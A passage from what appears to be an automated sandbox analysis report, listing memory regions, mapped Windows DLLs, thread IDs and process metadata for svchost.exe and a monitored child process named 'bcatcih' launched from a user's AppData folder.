0x2320000 end_va = 0x241ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 2379 start_va = 0x2420000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 2380 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 2381 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 2382 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2383 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 2384 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 2385 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 2386 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 2387 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 2388 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 2389 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 2390 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 2391 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 2392 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 2393 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2394 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2395 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2396 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2397 start_va = 0x7ff681250000 end_va = 0x7ff68125cfff monitored = 0 entry_point = 0x7ff681253980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2398 start_va = 0x7ff9ff3a0000 end_va = 0x7ff9ff3d2fff monitored = 0 entry_point = 0x7ff9ff3aae20 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 2399 start_va = 0x7ffa00990000 end_va = 0x7ffa00a17fff monitored = 0 entry_point = 0x7ffa009a4510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 2400 start_va = 0x7ffa07cc0000 end_va = 0x7ffa07cd3fff monitored = 0 entry_point = 0x7ffa07cc1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2401 start_va = 0x7ffa07ce0000 end_va = 0x7ffa07dd5fff monitored = 0 entry_point = 0x7ffa07d19590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2402 start_va = 0x7ffa08390000 end_va = 0x7ffa083a0fff monitored = 0 entry_point = 0x7ffa08392fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2403 start_va = 0x7ffa09490000 end_va = 0x7ffa0950efff monitored = 0 entry_point = 0x7ffa094a7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2404 start_va = 0x7ffa0b7a0000 end_va = 0x7ffa0b7aafff monitored = 0 entry_point = 0x7ffa0b7a1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2405 start_va = 0x7ffa0b7b0000 end_va = 0x7ffa0b7f7fff monitored = 0 entry_point = 0x7ffa0b7ba1e0 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 2406 start_va = 0x7ffa0b8c0000 end_va = 0x7ffa0b91cfff monitored = 0 entry_point = 0x7ffa0b8d2bf0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 2407 start_va = 0x7ffa0b9f0000 end_va = 0x7ffa0ba09fff monitored = 0 entry_point = 0x7ffa0b9f2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2408 start_va = 0x7ffa0ba10000 end_va = 0x7ffa0ba25fff monitored = 0 entry_point = 0x7ffa0ba119f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2409 start_va = 0x7ffa0ba70000 end_va = 0x7ffa0ba7dfff monitored = 0 entry_point = 0x7ffa0ba72e50 region_type = mapped_file name = "cmintegrator.dll" filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll") Region: id = 2410 start_va = 0x7ffa0ba80000 end_va = 0x7ffa0bab7fff monitored = 0 entry_point = 0x7ffa0ba868f0 region_type = mapped_file name = "wcmcsp.dll" filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll") Region: id = 2411 start_va = 0x7ffa0baf0000 end_va = 0x7ffa0bb27fff monitored = 0 entry_point = 0x7ffa0bb08cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2412 start_va = 0x7ffa0bb30000 end_va = 0x7ffa0bbc8fff monitored = 0 entry_point = 0x7ffa0bb4a090 region_type = mapped_file name = "wcmsvc.dll" filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll") Region: id = 2413 start_va = 0x7ffa0c7c0000 end_va = 0x7ffa0c8cafff monitored = 0 entry_point = 0x7ffa0c802610 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 2414 start_va = 0x7ffa0c9c0000 end_va = 0x7ffa0ca2ffff monitored = 0 entry_point = 0x7ffa0c9e2960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2415 start_va = 0x7ffa0e910000 end_va = 0x7ffa0eac0fff monitored = 0 entry_point = 0x7ffa0e963690 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 2416 start_va = 0x7ffa0eb30000 end_va = 0x7ffa0ec65fff monitored = 0 entry_point = 0x7ffa0eb5f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2417 start_va = 0x7ffa0ed60000 end_va = 0x7ffa0ee27fff monitored = 0 entry_point = 0x7ffa0eda13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2418 start_va = 0x7ffa0f0a0000 end_va = 0x7ffa0f0e9fff monitored = 0 entry_point = 0x7ffa0f0aac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 2419 start_va = 0x7ffa0f3e0000 end_va = 0x7ffa0f3f0fff monitored = 0 entry_point = 0x7ffa0f3e3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2420 start_va = 0x7ffa0ff00000 end_va = 0x7ffa0ff08fff monitored = 0 entry_point = 0x7ffa0ff019a0 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 2421 start_va = 0x7ffa0ff10000 end_va = 0x7ffa0ff1afff monitored = 0 entry_point = 0x7ffa0ff11cd0 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 2422 start_va = 0x7ffa0ff30000 end_va = 0x7ffa0ff47fff monitored = 0 entry_point = 0x7ffa0ff35910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2423 start_va = 0x7ffa11220000 end_va = 0x7ffa113a5fff monitored = 0 entry_point = 0x7ffa1126d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2424 start_va = 0x7ffa11410000 end_va = 0x7ffa11422fff monitored = 0 entry_point = 0x7ffa11412760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2425 start_va = 0x7ffa117d0000 end_va = 0x7ffa117f6fff monitored = 0 entry_point = 0x7ffa117d7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2426 start_va = 0x7ffa11800000 end_va = 0x7ffa118a9fff monitored = 0 entry_point = 0x7ffa11827910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2427 start_va = 0x7ffa11b10000 end_va = 0x7ffa11b41fff monitored = 0 entry_point = 0x7ffa11b22340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 2428 start_va = 0x7ffa11d90000 end_va = 0x7ffa11db3fff monitored = 0 entry_point = 0x7ffa11d93260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2429 start_va = 0x7ffa11f30000 end_va = 0x7ffa12023fff monitored = 0 entry_point = 0x7ffa11f3a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2430 start_va = 0x7ffa121a0000 end_va = 0x7ffa121abfff monitored = 0 entry_point = 0x7ffa121a27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2431 start_va = 0x7ffa12280000 end_va = 0x7ffa122b0fff monitored = 0 entry_point = 0x7ffa12287d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2432 start_va = 0x7ffa124f0000 end_va = 0x7ffa1250efff monitored = 0 entry_point = 0x7ffa124f5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2433 start_va = 0x7ffa12660000 end_va = 0x7ffa126bbfff monitored = 0 entry_point = 0x7ffa12676f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2434 start_va = 0x7ffa12830000 end_va = 0x7ffa1283afff monitored = 0 entry_point = 0x7ffa128319a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2435 start_va = 0x7ffa12a10000 end_va = 0x7ffa12a3cfff monitored = 0 entry_point = 0x7ffa12a29d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2436 start_va = 0x7ffa12ba0000 end_va = 0x7ffa12bf5fff monitored = 0 entry_point = 0x7ffa12bb0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2437 start_va = 0x7ffa12c20000 end_va = 0x7ffa12c48fff monitored = 0 entry_point = 0x7ffa12c34530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2438 start_va = 0x7ffa12d90000 end_va = 0x7ffa12da3fff monitored = 0 entry_point = 0x7ffa12d952e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2439 start_va = 0x7ffa12db0000 end_va = 0x7ffa12dbffff monitored = 0 entry_point = 0x7ffa12db56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2440 start_va = 0x7ffa12dc0000 end_va = 0x7ffa12e0afff monitored = 0 entry_point = 0x7ffa12dc35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2441 start_va = 0x7ffa12e10000 end_va = 0x7ffa12e1efff monitored = 0 entry_point = 0x7ffa12e13210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2442 start_va = 0x7ffa12f40000 end_va = 0x7ffa13106fff monitored = 0 entry_point = 0x7ffa12f9db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2443 start_va = 0x7ffa13130000 end_va = 0x7ffa13317fff monitored = 0 entry_point = 0x7ffa1315ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2444 start_va = 0x7ffa13320000 end_va = 0x7ffa13389fff monitored = 0 entry_point = 0x7ffa13356d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2445 start_va = 0x7ffa13390000 end_va = 0x7ffa133d2fff monitored = 0 entry_point = 0x7ffa133a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2446 start_va = 0x7ffa133e0000 end_va = 0x7ffa13465fff monitored = 0 entry_point = 0x7ffa133ed8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2447 start_va = 0x7ffa13b70000 end_va = 0x7ffa13cb2fff monitored = 0 entry_point = 0x7ffa13b98210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2448 start_va = 0x7ffa13cc0000 end_va = 0x7ffa13d5cfff monitored = 0 entry_point = 0x7ffa13cc78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2449 start_va = 0x7ffa13d60000 end_va = 0x7ffa13d67fff monitored = 0 entry_point = 0x7ffa13d61ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2450 start_va = 0x7ffa13d80000 end_va = 0x7ffa13ed5fff monitored = 0 entry_point = 0x7ffa13d8a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2451 start_va = 0x7ffa13ee0000 end_va = 0x7ffa14065fff monitored = 0 entry_point = 0x7ffa13f2ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2452 start_va = 0x7ffa14070000 end_va = 0x7ffa140cafff monitored = 0 entry_point = 0x7ffa140838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2453 start_va = 0x7ffa14220000 end_va = 0x7ffa142c6fff monitored = 0 entry_point = 0x7ffa1422b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2454 start_va = 0x7ffa14340000 end_va = 0x7ffa145bcfff monitored = 0 entry_point = 0x7ffa14414970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2455 start_va = 0x7ffa145c0000 end_va = 0x7ffa146dbfff monitored = 0 entry_point = 0x7ffa146002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2456 start_va = 0x7ffa146e0000 end_va = 0x7ffa1474afff monitored = 0 entry_point = 0x7ffa146f90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2457 start_va = 0x7ffa147c0000 end_va = 0x7ffa14880fff monitored = 0 entry_point = 0x7ffa147e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2458 start_va = 0x7ffa15090000 end_va = 0x7ffa15136fff monitored = 0 entry_point = 0x7ffa150a58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2459 start_va = 0x7ffa15160000 end_va = 0x7ffa1520cfff monitored = 0 entry_point = 0x7ffa151781a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2460 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3358 start_va = 0x2520000 end_va = 0x25f9fff monitored = 0 entry_point = 0x2553c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Thread: id = 136 os_tid = 0x13bc Thread: id = 137 os_tid = 0x13b8 Thread: id = 138 os_tid = 0x13a8 Thread: id = 139 os_tid = 0x1388 Thread: id = 140 os_tid = 0x984 Thread: id = 141 os_tid = 0xb20 Thread: id = 142 os_tid = 0x60c Thread: id = 143 os_tid = 0x82c Thread: id = 144 os_tid = 0x8c4 Thread: id = 145 os_tid = 0xafc Thread: id = 146 os_tid = 0x478 Thread: id = 147 os_tid = 0x468 Thread: id = 148 os_tid = 0x458 Thread: id = 149 os_tid = 0x450 Thread: id = 150 os_tid = 0x44c Thread: id = 151 os_tid = 0x434 Thread: id = 152 os_tid = 0x42c Thread: id = 153 os_tid = 0x8 Thread: id = 154 os_tid = 0x348 Thread: id = 155 os_tid = 0x324 Thread: id = 156 os_tid = 0x2f4 Thread: id = 157 os_tid = 0x2e8 Thread: id = 158 os_tid = 0x174 Thread: id = 159 os_tid = 0x284 Thread: id = 160 os_tid = 0x394 Process: id = "6" image_name = "bcatcih" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih" page_root = "0x71c4d000" os_pid = "0xd24" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x360" cmd_line = "C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2478 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2479 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2480 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2481 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2482 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2483 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2484 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2485 start_va = 0x400000 end_va = 0x24b2fff monitored = 1 entry_point = 0x4164e7 region_type = mapped_file name = "bcatcih" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih") Region: id = 2486 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2487 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2488 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2489 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2490 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2491 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 2492 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2493 start_va = 0x24c0000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 2494 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2499 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2500 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2501 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2502 start_va = 0x2540000 end_va = 0x282ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 2503 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2504 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2505 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2506 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2507 start_va = 0x2540000 end_va = 0x25fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2508 start_va = 0x2730000 end_va = 0x282ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 2513 start_va = 0x73e50000 end_va = 0x73ee1fff monitored = 0 entry_point = 0x73e90380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2514 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 2515 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2516 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2517 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2518 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2519 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 2520 start_va = 0x24c0000 end_va = 0x24e9fff monitored = 0 entry_point = 0x24c5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2521 start_va = 0x2530000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 2522 start_va = 0x2830000 end_va = 0x29b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 